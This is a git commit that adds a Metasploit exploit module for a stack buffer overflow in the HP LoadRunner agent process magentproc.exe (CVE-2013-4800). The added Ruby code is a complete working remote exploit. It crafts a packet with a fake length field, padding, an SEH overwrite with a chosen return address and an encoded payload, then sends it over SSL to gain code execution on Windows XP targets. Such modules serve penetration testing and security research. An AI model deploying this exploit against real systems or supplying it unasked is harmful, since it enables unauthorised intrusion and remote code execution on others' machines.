Land #2459 - Add HP LoadRunner magentproc.exe Overflow

2013-10-04 19:45:44 -05:00 · 2013-10-04 19:45:44 -05:00 · a8de9d5c8b
parent f9eccae391 646429b4dd
commit a8de9d5c8b
1 changed files with 83 additions and 0 deletions
--- a/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb
+++ b/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb
@ -0,0 +1,83 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'HP LoadRunner magentproc.exe Overflow',
+      'Description'    => %q{
+        This module exploits a stack buffer overflow in HP LoadRunner before 11.52. The
+        vulnerability exists on the LoadRunner Agent Process magentproc.exe. By sending
+        a specially crafted packet, an attacker may be able to execute arbitrary code.
+      },
+      'Author'         =>
+        [
+          'Unknown', # Original discovery # From Tenable Network Security
+          'juan vazquez' # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['CVE', '2013-4800'],
+          ['OSVDB', '95644'],
+          ['http://www.zerodayinitiative.com/advisories/ZDI-13-169/']
+        ],
+      'Privileged'     => false,
+      'DefaultOptions' =>
+        {
+          'SSL' => true,
+          'SSLVersion' => 'SSL3',
+          'PrependMigrate' => true
+        },
+      'Payload'        =>
+        {
+          'Space'    => 4096,
+          'DisableNops' => true,
+          'BadChars' => "\x00",
+          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
+        },
+      'Platform'       => 'win',
+      'DefaultTarget'  => 0,
+      'Targets'        =>
+        [
+          [
+            'Windows XP SP3 / HP LoadRunner 11.50',
+            {
+              # magentproc.exe 11.50.2042.0
+              'Offset' => 1104,
+              'Ret' => 0x7ffc070e, # ppr # from NLS tables # Tested stable over Windows XP SP3 updates
+              'Crash' => 6000 # Length needed to ensure an exception
+            }
+          ]
+        ],
+      'DisclosureDate' => 'Jul 27 2013'))
+
+      register_options([Opt::RPORT(443)], self.class)
+  end
+
+  def exploit
+
+    req = [0xffffffff].pack("N") # Fake Length
+    req << rand_text(target['Offset'])
+    req << generate_seh_record(target.ret)
+    req << payload.encoded
+    req << rand_text(target['Crash'])
+
+    connect
+    print_status("Sending malicious request...")
+    sock.put(req)
+    disconnect
+
+  end
+end